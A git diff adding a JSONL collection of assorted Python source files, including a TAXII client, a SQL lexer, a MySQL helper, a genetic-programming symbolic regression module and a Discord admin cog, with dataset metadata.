diff --git "a/3627.jsonl" "b/3627.jsonl" new file mode 100644--- /dev/null +++ "b/3627.jsonl" @@ -0,0 +1,757 @@ +{"seq_id":"512020499","text":"from cytaxii2 import cytaxii2\nimport logging\nfrom linesout import *\nfrom load_config import *\nfrom utils import *\n\nall_collections = [] # All collections in default api root\nall_collection_ids = [] # All collection id in collection in default api root\nall_objects = []\ntype_address = []\n\n#Create and configure logger\nlogging.basicConfig(filename=\"taxiiclient.log\",format='%(asctime)s : %(message)s',filemode='a') \n#Creating an object\nlog=logging.getLogger()\n#Setting the threshold of logger to DEBUG\nlog.setLevel(logging.DEBUG)\n\n\ndef connect_and_discover(url,username,password,version=VERSION):\n # Instantiate server and get API Root\n cytaxii_object = cytaxii2.cytaxii2(discovery_url=url,username=username, password=password, version=version)\n log.info(\"Created Cytaxii Object\")\n discovery_response = cytaxii_object.discovery_request()\n debug_L2_print(\"====== Discovery Response =======\")\n print_object(discovery_response) # will print object if config, PRINT OBJECT is set to True.\n root_discovery_response = cytaxii_object.root_discovery()\n debug_L2_print(\"====== Root Discovery Response =======\")\n print_object(root_discovery_response) # will print object if config, PRINT OBJECT is set to True.\n log.info(\"Root discovered\")\n debug_L2_print(\"========== Connected and Discovered Successfully ==========\")\n log.info(\"Connected and Discovered Successfully\")\n return cytaxii_object\n\n# Getting list of collections form root api\ndef get_collections(cytaxii_object : cytaxii2.cytaxii2):\n collections = cytaxii_object.collection_request()\n log.info(\"Got list of collections from root API. 
\")\n print_object(collections)\n return collections['response']['collections']\n\n# Get the Collection info by collection id\ndef get_collections_data(cytaxii_object : cytaxii2.cytaxii2,collection_id):\n collection_data = cytaxii_object.collection_data_request(collection_id=collection_id)\n print_object(collection_data)\n return collection_data\n\n# Pull the data from the collection with Collection ID and filters including added_after, limit, object_id\ndef pull_data(cytaxii_object : cytaxii2.cytaxii2,collection_id,added_after=None, limit=None, object_id=None,next=None):\n poll_response = cytaxii_object.poll_request(collection_id=collection_id, added_after=added_after, next=next, limit=limit, object_id=object_id)\n # print_object(poll_response)\n return poll_response\n\n\ndef main():\n log.info(\"Program started running\")\n COLLECTION_IDs = []\n # Get added_after value \n ADDED_AFTER = get_added_after()\n log.info(\"Got ADDED AFTER value : \" + str(ADDED_AFTER))\n\n # Create an object, Connect to Taxii server & Discover \n cytaxii_object = connect_and_discover(url=URL, username=USERNAME, password=PASSWORD)\n \n # This will get all the collections in default api root url.\n all_collections = get_collections(cytaxii_object)\n\n log.info(\"Number of collections got : \" + str(len(all_collections)))\n\n # Get all the Collection ids in an arr\n for collection in all_collections:\n all_collection_ids.append(collection[\"id\"])\n\n # iterate through all the collection_ids to get all the readable objects in an array (all_objects)\n for id in all_collection_ids:\n if get_collections_data(cytaxii_object,collection_id=id)['response']['can_read'] == True:\n polled_data = pull_data(cytaxii_object,collection_id=id,added_after=ADDED_AFTER)\n objects = polled_data[\"response\"]['objects']\n for object in objects:\n all_objects.append(object)\n\n # Check for pagination by puting next vaules in filter \n while polled_data['response']['more']:\n next = int(polled_data['response']['next'])\n polled_data = pull_data(cytaxii_object,collection_id=id,next=next,added_after=ADDED_AFTER)\n all_objects.extend(polled_data['response']['objects'])\n\n # parse all the objects we got and process\n for object in all_objects: \n parse_object(object)\n # store_data(object) # store for backup, feedback, maintainance, experiment, improving, etc\n\n do_filter_csv()\n update_added_after()\n\nmain()","sub_path":"vehere_taxii2_client.py","file_name":"vehere_taxii2_client.py","file_ext":"py","file_size_in_byte":4197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"384012222","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.14-x86_64/egg/wsiprocess/annotation.py\n# Compiled at: 2019-12-13 21:46:56\n# Size of source mod 2**32: 3546 bytes\nimport cv2, numpy as np\nfrom pathlib import Path\nfrom .annotationparser import ASAP_parser\nfrom annotationparser.parser_utils import detect_type\n\nclass Annotation:\n\n def __init__(self, path):\n self.path = path\n self.read_annotation()\n self.masks = {}\n self.contours = {}\n self.mask_coords = {}\n\n def read_annotation(self, annotation_type=False):\n annotation_type = detect_type(self.path)\n if annotation_type == 'ASAP':\n parser = ASAP_parser()\n parser(self.path)\n else:\n if annotation_type == 'Unknown':\n pass\n self.annotations = parser.annotations\n self.annotation_groups = 
parser.annotation_groups\n self.classes = parser.classes\n self.mask_coords = parser.mask_coords\n assert len(self.annotations) > 0, 'No annotations found.'\n\n def make_masks(self, slide, inclusion=False, foreground=False, size=2000):\n self.base_masks(slide.wsi_height, slide.wsi_width)\n self.main_masks()\n if inclusion:\n self.exclude_masks(inclusion)\n if foreground:\n self.make_foreground_mask(slide, size)\n\n def base_masks(self, wsi_height, wsi_width):\n for cls in self.classes:\n self.base_mask(cls, wsi_height, wsi_width)\n\n def base_mask(self, cls, wsi_height, wsi_width):\n self.masks[cls] = np.zeros((wsi_height, wsi_width), dtype=(np.uint8))\n self.mask_coords[cls] = []\n\n def main_masks(self):\n for cls in self.classes:\n contours = np.array(self.mask_coords[cls])\n for contour in contours:\n self.masks[cls] = cv2.drawContours((self.masks[cls]), [np.int32(contour)], 0, True, thickness=(cv2.FILLED))\n\n def exclude_masks(self, inclusion):\n self.masks_exclude = self.masks.copy()\n for cls in self.classes:\n if hasattr(inclusion, cls):\n for exclude in getattr(inclusion, cls):\n overlap_area = cv2.bitwise_and(self.masks[cls], self.masks[exclude])\n self.masks_exclude[cls] = cv2.bitwise_xor(self.masks[cls], overlap_area)\n\n self.masks = self.masks_exclude\n\n def make_foreground_mask(self, slide, size=2000):\n if 'foreground' not in self.classes:\n thumb = slide.slide.thumbnail_image(size, height=size)\n thumb = np.ndarray(buffer=(thumb.write_to_memory()), dtype=(np.uint8), shape=[thumb.height, thumb.width, thumb.bands])\n thumb_gray = cv2.cvtColor(thumb, cv2.COLOR_RGB2GRAY)\n _, th = cv2.threshold(thumb_gray, 0, 1, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\n self.masks['foreground'] = cv2.resize(th, (slide.width, slide.height))\n self.classes.append('foreground')\n\n def export_thumb_masks(self, save_to='.', size=512):\n for cls in self.masks.keys():\n self.export_thumb_mask(cls, save_to, size)\n\n def export_thumb_mask(self, cls, save_to='.', size=512):\n mask = self.masks[cls]\n height, width = mask.shape\n scale = max(size / height, size / width)\n mask_resized = cv2.resize(mask, dsize=None, fx=scale, fy=scale)\n mask_scaled = mask_resized * 255\n cv2.imwrite(str(Path(save_to) / '{}_thumb.png'.format(cls)), mask_scaled)\n\n def export_masks(self, save_to):\n for cls in self.masks.keys():\n self.export_mask(save_to, cls)\n\n def export_mask(self, save_to, cls):\n cv2.imwrite(str(Path(save_to) / '{}.png'.format(cls)), self.masks[cls], (cv2.IMWRITE_PXM_BINARY, 1))","sub_path":"pycfiles/wsiprocess-0.0.1-py3.7/annotation.cpython-37.py","file_name":"annotation.cpython-37.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334938880","text":"import sys\nimport glob\nimport os\n\n\ninit_path = sys.argv[1]\nrel_path = sys.argv[2]\npattern = sys.argv[3:]\n\ndef _getDirs(base):\n return [x for x in glob.iglob(os.path.join( base, '*')) if os.path.isdir(x) ]\n\ndef rglob(base, pattern):\n list = []\n list.extend(glob.glob(os.path.join(base,pattern)))\n dirs = _getDirs(base)\n if len(dirs):\n for d in dirs:\n list.extend(rglob(os.path.join(base,d), pattern))\n return list\ndef get_audio( init_path, rel_path, pattern ):\n selftuple = ();\n for l in rglob(os.path.join(init_path,rel_path), pattern):\n selftuple= selftuple +tuple([l[len(init_path):]])\n return(selftuple)\n\nap_num = 0;\ndirs = _getDirs(os.path.join(init_path,rel_path))\nf = open('demo.js', 'w')\nif len(dirs):\n for d in dirs:\n 
folder = os.path.relpath(d,d+\"/..\")\n print(folder)\n ap_num+=1\n toplay = ();\n for patt in pattern:\n toplay += get_audio(init_path,os.path.join(rel_path,folder),patt)\n f.write(\"$(document).ready(function(){\\n \\\n new jPlayerPlaylist({\\n \\\n jPlayer: '#jquery_jplayer_\"+str(ap_num)+\"',\\n \\\n cssSelectorAncestor: '#jp_container_\"+str(ap_num)+\"'\\n \\\n }, [\\n \");\n cont=0;\n for s in toplay:\n cont+=1;\n f.write(\" {\\n \\\n title: '\"+ os.path.splitext(os.path.basename(s))[0] +\"',\\n \\\n artist: '\"+folder+\"',\\n \\\n mp3: '\"+s+\"',\\n \\\n poster: '/\"+os.path.join(rel_path,folder)+\"/cover.jpg'\\n \\\n }\");\n if cont!=len(toplay):\n f.write(\",\\n\");\n\n f.write(\" ], {\\n \\\n swfPath: '../../dist/jplayer',\\n \\\n supplied: 'oga, mp3',\\n \\\n wmode: 'window',\\n \\\n useStateClassSkin: true,\\n \\\n autoBlur: false,\\n \\\n smoothPlayBar: true,\\n \\\n keyEnabled: true\\n \\\n });\\n\\\n });\\n\");\nf.close()","sub_path":"public/media/mp3search.py","file_name":"mp3search.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156538078","text":"#Palabras reservadas para la gramatica\nreservadas = {\n 'select' : 'SELECT',\n 'update' : 'UPDATE',\n 'where' : 'WHERE',\n 'join' : 'JOIN',\n 'create' : 'CREATE',\n 'delete' : 'DELETE',\n 'count' : 'COUNT',\n 'sum' : 'SUM',\n 'from' : 'FROM',\n 'case' : 'CASE',\n 'then' : 'THEN',\n 'else' : 'ELSE',\n 'smallint' : 'SMALLINT',\n 'integer' : 'INTEGER',\n 'bigint' : 'BIGINT',\n 'decimal' : 'DECIMAL',\n 'numeric' : 'NUMERIC',\n 'real' : 'REAL',\n 'money' : 'MONEY',\n 'char' : 'CHAR',\n 'character' : 'CHARACTER',\n 'varying' : 'VARYING',\n 'timestamp' : 'TIMESTAMP',\n 'without' : 'WITHOUT',\n 'with' : 'WITH',\n 'time' : 'TIME',\n 'zone' : 'ZONE',\n 'date' : 'DATE',\n 'interval' : 'INTERVAL',\n 'fields' : 'FIELDS',\n 'year' : 'YEAR',\n 'month' : 'MONTH',\n 'day' : 'DAY',\n 'hour' : 'HOUR',\n 'minute' : 'MINUTE',\n 'second' : 'SECOND',\n 'to' : 'TO',\n 'boolean' : 'BOOLEAN',\n 'as' : 'AS',\n 'enum' : 'ENUM',\n 'type' : 'TYPE',\n 'is' : 'IS',\n 'isnull' : 'ISNULL',\n 'notnull' : 'NOTNULL',\n 'not' : 'NOT',\n 'and' : 'AND',\n 'or' : 'OR',\n 'between' : 'BETWEEN',\n 'like' : 'LIKE',\n 'in' : 'IN',\n 'ilike' : 'ILIKE',\n 'similar' : 'SIMILAR',\n 'replace' : 'REPLACE',\n 'mode' : 'MODE',\n 'owner' : 'OWNER',\n 'if' : 'IF',\n 'exists' : 'EXISTS',\n 'alter' : 'ALTER',\n 'database' : 'DATABASE',\n 'rename' : 'RENAME',\n 'drop' : 'DROP',\n 'table' : 'TABLE',\n 'primary' : 'PRIMARY',\n 'foreign' : 'FOREIGN',\n 'key' : 'KEY',\n 'references' : 'REFERENCES',\n 'constraint' : 'CONSTRAINT',\n 'check' : 'CHECK',\n 'set' : 'SET',\n 'insert' : 'INSERT',\n 'by' : 'BY',\n 'group' : 'GROUP',\n 'having' : 'HAVING',\n 'order' : 'ORDER',\n 'when' : 'WHEN',\n 'union' : 'UNION',\n 'end' : 'END',\n 'values' : 'VALUES',\n 'intersect' : 'INTERSECT',\n 'limit' : 'LIMIT',\n 'inner' : 'INNER',\n 'left' : 'LEFT',\n 'right' : 'RIGHT',\n 'outer' : 'OUTER',\n 'asc' : 'ASC',\n 'desc' : 'DESC',\n 'greatest' : 'GREATEST',\n 'least' : 'LEAST',\n 'offset' : 'OFFSET',\n 'first' : 'FIRST',\n 'last' : 'LAST',\n 'full' : 'FULL',\n 'all' : 'ALL',\n 'true' : 'TRUE',\n 'false' : 'FALSE',\n 'inherits' : 'INHERITS',\n 'null' : 'NULL'\n}\n\n#Lista de tokens\ntokens = [\n 'PUNTO',\n 'ASTERISCO',\n 'PUNTOCOMA',\n 'IGUAL',\n 'PAR_ABRE',\n 'PAR_CIERRA', \n 'CADENA',\n 'ENTERO',\n 'MENOR_IGUAL',\n 'MAS',\n 'MAYOR_IGUAL',\n 'NO_IGUAL',\n 'DIFERENTE',\n 'CORCHE_ABRE',\n 'CORCHE_CIERRA',\n 
'CASTEO',\n 'MENOR',\n 'MAYOR',\n 'MENOS',\n 'COMA',\n 'DIVISION',\n 'MODULO',\n 'POTENCIA',\n 'ID'\n] + list(reservadas.values())\n\n#Expresiones regulares\nt_PUNTO = r'\\.'\nt_ASTERISCO = r'\\*'\nt_MAS = r'\\+'\nt_PUNTOCOMA = r';'\nt_IGUAL = r'='\nt_PAR_ABRE = r'\\('\nt_PAR_CIERRA = r'\\)'\nt_MENOR = r'<'\nt_MAYOR = r'>'\nt_COMA = r','\nt_MENOR_IGUAL = r'<='\nt_MAYOR_IGUAL = r'>='\nt_NO_IGUAL = r'!='\nt_DIFERENTE = r'<>'\nt_MENOS = r'-'\nt_DIVISION = r'/'\nt_MODULO = r'%'\nt_CORCHE_ABRE = r'\\['\nt_CORCHE_CIERRA = r'\\]'\nt_POTENCIA = r'\\^'\nt_CASTEO = r'::'\n\ndef t_DECIMAL(t):\n r'\\d+(\\.\\d+)?'\n try:\n t.value = float(t.value)\n except ValueError:\n print(\"Valor decimal es muy grande %d\", t.value)\n t.value = 0\n return t\n\ndef t_ENTERO(t):\n r'\\d+'\n try:\n t.value = int(t.value)\n except ValueError:\n print(\"Valor entero es muy grande %d\", t.value)\n t.value = 0\n return\n\ndef t_CADENA(t):\n r'(\\\".*?\\\")|(\\'.*?\\')'\n t.value = t.value[1:-1]\n t.value = t.value.replace(\"\\\\\\\"\", \"\\\"\").replace(\"\\\\\\'\", \"\\'\").replace(\"\\\\n\", \"\\n\").replace(\"\\\\t\", \"\\t\")\n return t\n\ndef t_ID(t):\n r'[a-zA-Z_][a-zA-Z_0-9]*'\n t.type = reservadas.get(t.value.lower(),'ID') \n return t\n\n# Comentario de múltiples líneas /* .. */\ndef t_COMENTARIO_MULTILINEA(t):\n r'/\\*(.|\\n)*?\\*/'\n t.lexer.lineno += t.value.count('\\n')\n\n# Comentario simple // ...\ndef t_COMENTARIO_SIMPLE(t):\n r'--.*\\n'\n t.lexer.lineno += 1\n\nt_ignore = \" \\t\"\n\ndef t_newline(t):\n r'\\n+'\n t.lexer.lineno += t.value.count(\"\\n\")\n\ndef t_error(t):\n print(\"Caracter incorrecto '%s'\" % t.value[0])\n t.lexer.skip(1)\n\nimport re\nimport ply.lex as lex\nlexer = lex.lex(reflags=re.IGNORECASE)\n\nprecedence = (\n ('left', 'PAR_ABRE', 'PAR_CIERRA')\n)\n#Analizador Sintáctico \n\ndef p_init(t):\n 'init : instrucciones'\n t[0] = t[1]\n\ndef p_instrucciones_lista(t):\n 'instrucciones : instruccion instrucciones'\n t[2].insert(0, t[1])\n t[0] = t[2]\n\ndef p_instrucciones_instruccion(t):\n 'instrucciones : '\n t[0] = []\n\ndef p_instruccion(t):\n '''instruccion : select_instr'''\n\n","sub_path":"parser/team23/grammar/descendente.py","file_name":"descendente.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"159629794","text":"# -*- coding: utf-8 -*-\n\nimport easygui\neasygui.msgbox(\"Willkommen im Adressen-zusammenfüg-Prgramm!\")\nname = easygui.enterbox(\"Bitte geben Sie Ihren kompletten Namen ein:\")\nstrasse = easygui.enterbox(\"Und nun den Namen der Strasse, in der Sie leben\")\nhausnummer = easygui.enterbox(\"Ihre Hausnummer, bitte:\")\nPLZ = easygui.enterbox(\"Jetzt die Postleitzahl Ihrer Stadt\")\nstadt = easygui.enterbox(\"Schlussendlich den Namen der Stadt, in der Sie leben\")\n\nadresse = name + \"\\n\" + strasse + \" \" + hausnummer + \"\\n\" + PLZ + \" \" + stadt\neasygui.msgbox(adresse)\n\n","sub_path":"Buch/adressen.py","file_name":"adressen.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"197821864","text":"VERBOSE=3\nTITLE=\"simple-flat\"\nWORKFLOW='inversion' # inversion, migration\n#WORKFLOW='test_forward' # inversion, migration\nSOLVER='specfem2d' # specfem2d, specfem3d\n#SYSTEM='serial' # serial, pbs, slurm\n#SYSTEM='multicore' # serial, pbs, slurm\n#SYSTEM='slurm_sm' # serial, pbs, slurm\nSYSTEM='pvc_sm' # serial, pbs, slurm\nOPTIMIZE='LBFGS' # base, 
newton\n#OPTIMIZE='NLCG' # base, newton\nPREPROCESS='base' # base\nPOSTPROCESS='base' # base\n\nMISFIT='Waveform'\n#MATERIALS='LegacyAcoustic'\nMATERIALS='Acoustic'\n#MATERIALS='Elastic'\nDENSITY='Constant'\n\n\n# WORKFLOW\nBEGIN=1 # first iteration\nEND=200 # last iteration\nNREC=250 # number of receivers\n#NREC=132 # number of receivers\n#NSRC=25 # number of sources\nNSRC=20 # number of sources\nSAVEGRADIENT=1 # save gradient how often\nSAVETRACES=1\n\n\n# PREPROCESSING\nFORMAT='su' # data file format\nREADER='su_specfem2d'\n#acoustic should be z or p\nCHANNELS='p' # data channels\n#try below for elastic\n#CHANNELS='y' # data channels\n#CHANNELS='xz' # data channels\n#NORMALIZE='NormalizeTracesL2' # normalize\nNORMALIZE=0 # normalize\nBANDPASS=0 # bandpass\nFREQLO=0. # low frequency corner\nFREQHI=0. # high frequency corner\nMUTECONST=0.75 # mute constant\nMUTESLOPE=1500. # mute slope\nMUTE='MuteShortOffsets' \nMUTE_SHORT_OFFSETS_DIST=100\n\n\n# POSTPROCESSING\nSMOOTH=10. # smoothing radius\n#SCALE=6.0e6 # scaling factor\nSCALE=1 # scaling factor\n\n\n# OPTIMIZATION\n#PRECOND=None # preconditioner type\n#STEPMAX=10 # maximum trial steps\nSTEPCOUNTMAX=10 # maximum trial steps\nSTEPTHRESH=0.1 # step length safeguard\n\n\n# SOLVER\nNT=5000 # number of time steps\nDT=1.0e-3 # time step\n#NT=48000 # number of time steps\n#DT=0.006 # time step\nF0=5.0 # dominant frequency\n\n\n# SYSTEM\nNTASK=NSRC # must satisfy 1 <= NTASK <= NSRC\n#NTASK=1 # must satisfy 1 <= NTASK <= NSRC\nNPROC=1 # processors per task\n#NPROCMAX=12\nWALLTIME=1500 # walltime\n\n#MPIEXEC='mpirun'\nFLIP_SIGN=\"yes\"\n#SLURMARGS='--ntasks-per-core=1'\nSLURMARGS='--exclusive'\n","sub_path":"examples/simple-flat/parameters.py","file_name":"parameters.py","file_ext":"py","file_size_in_byte":2446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"186952277","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\ndef func(x, a, b, c):\r\n return a * np.exp(-b * x) + c\r\n\r\nsize = 500\r\nnet_type = 'ResNetShallow'\r\npath = './stat/'\r\n\r\nx = np.load(path + str(size) + net_type + 'TrainIter.npy')\r\ny_train = np.load(path + str(size) + net_type + 'TrainErr.npy')\r\ny_test = np.load(path + str(size) + net_type + 'TestErr.npy')\r\nfig = plt.figure()\r\nplt.plot(x, y_train, label='Training Accuracy', alpha=0.5)\r\nplt.plot(x, y_test, label='Testing Accuracy', alpha=0.5)\r\nplt.ylim(0, 1)\r\nplt.xlim(0, max(x))\r\n\r\nz = np.polyfit(x, y_train, 4)\r\np = np.poly1d(z)\r\nplt.plot(x, p(x), 'b', label='Training Fitting')\r\n\r\nprint('Train Final Acc: ' + str(p(max(x))))\r\n\r\nz = np.polyfit(x, y_test, 4)\r\np = np.poly1d(z)\r\nplt.plot(x, p(x), 'r', label='Testing Fitting')\r\nplt.legend()\r\n\r\nprint('Test Final Acc: ' + str(p(max(x))))\r\nfig.savefig('./report/'+str(size)+net_type+'.png')\r\nprint('Save as '+ './report/'+str(size)+net_type+'.png')","sub_path":"poly_fit.py","file_name":"poly_fit.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552179492","text":"from __future__ import absolute_import, annotations\nimport mysql.connector\nfrom mysql.connector import errorcode, Error\nimport pandas as pd\n\n\nclass MySQLManager:\n\n def __init__(self, host: str, port: int, user: str, password: str, database: str) -> None:\n \"\"\"\n Connects python to MySQL, requiring host, port, username, password and database.\n \"\"\"\n self.connection = mysql.connector.connect(\n 
host=host,\n user=user,\n port=port,\n password=password,\n database=database\n )\n self.connection.autocommit = True\n\n def label_irpef(self, table_name: str):\n \"\"\"\n Creates census brackets following the Irpef (sub)categories.\n :param str table_name: Name of the table whose census data will be modified\n :return: modified table having the attribute \"y\" standardized\n \"\"\"\n cursor = self.connection.cursor(buffered=True)\n try:\n query = \" UPDATE {} SET {} = CASE\" \\\n \" WHEN {} < 15000 THEN '1'\" \\\n \" WHEN {} BETWEEN 15001 AND 22000 THEN '2'\" \\\n \" WHEN {} BETWEEN 22001 AND 28000 THEN '3'\" \\\n \" WHEN {} BETWEEN 28001 AND 35000 THEN '4'\" \\\n \" WHEN {} BETWEEN 35001 AND 42000 THEN '5'\" \\\n \" WHEN {} BETWEEN 42001 AND 49000 THEN '6'\" \\\n \" WHEN {} BETWEEN 49001 AND 55000 THEN '7'\" \\\n \" WHEN {} BETWEEN 55001 AND 75000 THEN '8'\" \\\n \" ELSE '9'\" \\\n \" END\".format(table_name, \"y\", \"y\", \"y\", \"y\", \"y\", \"y\", \"y\", \"y\", \"y\")\n cursor.execute(query)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"Table {} already exists.\".format(table_name))\n else:\n print(err.msg)\n cursor.close()\n\n def execute_read_query(self, table_name: str):\n \"\"\"\n Select operation to recall a table stored in the project_bdt database\n :param str table_name: name of the table that the user wants to recall\n :return: the table is returned as Pandas DataFrame\n \"\"\"\n cursor = self.connection.cursor()\n try:\n query = \"SELECT * FROM {}\".format(table_name)\n cursor.execute(query)\n result = cursor.fetchall()\n return pd.DataFrame(result)\n except Error as e:\n print(f\"The error '{e}' occurred\")\n\n","sub_path":"src/saver.py","file_name":"saver.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"620503795","text":"\"\"\"\nThis module implements Symbolic Regression and Division\n\"\"\"\nimport argparse\n\nfrom ast_trees import AST\nfrom utils import graph_generation, create_heatmap\nfrom trees import AddNode, MultNode, SubNode, DivNode\nfrom ga_trees import GeneticAlgorithm\n\n\nclass SymbolicRegression:\n\n def __init__(self, function, min_value=-100, max_value=100, limit_depth=10, with_div=False):\n \"\"\"\n Constructs an instance of the class.\n :param function: function that must be found\n :param min_value: min value of the domain\n :param max_value: max value of the domain\n :param limit_depth: depth from which a tree is punished\n :param with_div: true if division is allowed, otherwise false\n \"\"\"\n # Rango de valores del dominio\n self.function_domain = [x for x in range(min_value, max_value + 1)]\n\n # Valores de la función para el rango [min_value, max_value]\n self.obj_values = [function(x) for x in self.function_domain]\n\n # Terminales permitidos\n self.allowed_terminals = [x for x in range(-10, 11)]\n self.allowed_terminals.extend(['x' for _ in range(20)])\n\n # Funciones permitidas\n self.allowed_functions = [AddNode, SubNode, MultNode]\n self.with_div = with_div\n\n if self.with_div:\n self.allowed_functions.append(DivNode)\n\n # Variables que intervienen en el algoritmo\n self.limit_depth = limit_depth\n\n def calculate_mse(self, tree):\n \"\"\"\n Calculates the mean square error for the given tree.\n :param tree: an instance of the class Node\n :return: mse of the tree if the tree doesn't divide by cero, otherwise None\n \"\"\"\n # Se obtiene el resultado de la ecuación contenida en el árbol 
para cada uno de los valores del dominio\n tree_values = []\n for x in self.function_domain:\n try:\n tree_values.append(tree.eval(dict_values={'x': x}))\n except ZeroDivisionError:\n return None\n\n # Cálculo el error cuadrático medio\n mse = sum([(x_tree - x_obj) ** 2 for x_tree, x_obj in zip(tree_values, self.obj_values)]) / len(\n self.function_domain)\n\n return mse\n\n def generate_gene(self):\n \"\"\"\n Builds a new tree by using the class AST.\n This tree is used for mutation.\n :return: an AST\n \"\"\"\n return AST(allowed_functions=self.allowed_functions, allowed_terminals=self.allowed_terminals)(max_depth=4)\n\n def generate_individual(self):\n \"\"\"\n Builds a new tree by using the class AST.\n :return: an AST\n \"\"\"\n return AST(allowed_functions=self.allowed_functions, allowed_terminals=self.allowed_terminals)(max_depth=4)\n\n def fitness(self, tree):\n \"\"\"\n Calculates how close a tree is.\n :param tree: an instance of the class Node\n :return: a number that represents how close the tree is\n \"\"\"\n # Cálculo el error cuadrático medio\n mse = self.calculate_mse(tree)\n\n # Se verifica que no se dividió por 0. Si es así, el fitness del árbol tiene el valor 0.\n if mse is None:\n return 0\n\n # Castigo por la profundidad del árbol\n depth = tree.get_depth()\n factor_depth = 1 if depth <= self.limit_depth else 1 / (1 + depth - self.limit_depth)\n\n # Cálculo del fitness\n fitness = (1 / (1 + mse)) * factor_depth if mse > 0 else 1 * factor_depth\n\n return fitness\n\n def condition_finish(self, **kwargs):\n \"\"\"\n Set the condition to finish the algorithm.\n :return: true if the condition is true, otherwise false\n \"\"\"\n best_tree = kwargs['population_dict'][kwargs['best_id']]\n\n # Se calcula el mse del mejor árbol\n mse = self.calculate_mse(best_tree)\n\n # Condición de término\n if mse == 0 or kwargs['max_generation'] == kwargs['generation']:\n print(\"Best Tree: {}\\nMean Cuadratic Error: {}\".format(best_tree, mse))\n\n return True\n\n return False\n\n\nif __name__ == '__main__':\n # Sets the comands\n parser = argparse.ArgumentParser()\n parser.add_argument('--division', help='Ver si se permite la división', required=False, default='false')\n parser.add_argument('--heatmap', required=False, default='false')\n args = parser.parse_args()\n\n # Initialize the problem\n if args.division.lower() == 'true':\n obj = SymbolicRegression(function=lambda x: x + x/2 - 6, with_div=True)\n else:\n obj = SymbolicRegression(function=lambda x: x**2 + x - 6, with_div=False)\n\n # Initialize the genetic algorithm\n genetic_algorithm = GeneticAlgorithm(population_size=35,\n fitness=obj.fitness,\n generate_gene=obj.generate_gene,\n generate_individual=obj.generate_individual,\n mutation_rate=0.1,\n condition_finish=obj.condition_finish,\n max_generation=100)\n\n if obj.with_div:\n print(\"Running Symbolic Regression with Division...\")\n else:\n print(\"Running Symbolic Regression...\")\n\n generations_data = genetic_algorithm.run_algorithm()\n\n graph_generation(generations_scores=generations_data, title='Symbolic Regression')\n\n # Creates the HeatMap\n if args.heatmap.lower() == 'true':\n print('Creating the HeatMap...')\n create_heatmap(obj)\n","sub_path":"tarea3/symbolic_regression.py","file_name":"symbolic_regression.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"406796403","text":"def get_data(aTuple):\n nums=()\n words=()\n for t in aTuple:\n nums=nums+(t[0],)\n if t[1] 
not in words:\n words =words+(t[1],)\n min_n=min(nums)\n max_n=max(nums)\n unique_words=len(words)\n return (min_n,max_n,unique_words)\n\ntest=((1,\"a\"),(2,\"b\"),(1,\"a\"),(7,\"b\"))\n(a,b,c)=get_data(test)\nprint(\"a:\",a,\"b:\",b,\"c:\",c)\n","sub_path":"17/1702.py","file_name":"1702.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"499935761","text":"# Author: YeetMachine#1337 | Modified: Davis#9654\nfrom discord.ext import commands\nimport discord\n\n\nclass Administrator(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"add_auth_role\")\n async def add_auth_role(self, ctx, role: commands.RoleConverter):\n \"\"\"Adds role to Auth\"\"\"\n print(role)\n print(type(role))\n if role.id in self.bot.get_guild_data(ctx.guild.id, key=\"auth_role\"):\n await ctx.send(\"Role already added\")\n return\n self.bot.guild_data_update(ctx.guild.id, {\"auth_role\": role.id}, append=True)\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"remove_auth_role\")\n async def remove_auth_role(self, ctx, role: commands.RoleConverter):\n \"\"\"Adds role to Auth\"\"\"\n print(role)\n print(type(role))\n if role.id in self.bot.get_guild_data(ctx.guild.id, key=\"auth_role\"):\n auth_roles = self.bot.get_guild_data(ctx.guild.id, key=\"auth_role\")\n self.bot.guild_data_update(ctx.guild.id, data={\"auth_roles\": auth_roles.remove(role.id)}, append=False)\n await ctx.send(\"Role removed\")\n return\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"print_message\")\n async def print_message(self, ctx, channel: commands.TextChannelConverter):\n messages = [ctx.message, await ctx.send(\"Send Message\")]\n\n def check(m):\n return m.author == ctx.message.author and m.channel.id == ctx.message.channel.id\n\n user_msg = await self.bot.wait_for('message', check=check, timeout=240)\n messages.append(user_msg)\n await channel.send(user_msg.content)\n\n @commands.has_permissions(administrator=True)\n @commands.command(name=\"edit_message\")\n async def edit_message(self, ctx, message: commands.MessageConverter):\n messages = [ctx.message]\n if message.author.id is not self.bot.user.id:\n return\n print(\"Editing\")\n messages.append(await ctx.send(\"Send Message\"))\n\n def check(m):\n return m.author == ctx.message.author and m.channel.id == ctx.message.channel.id\n\n user_msg = await self.bot.wait_for('message', check=check, timeout=240)\n await message.edit(content=user_msg.content)\n\n for message in messages:\n await 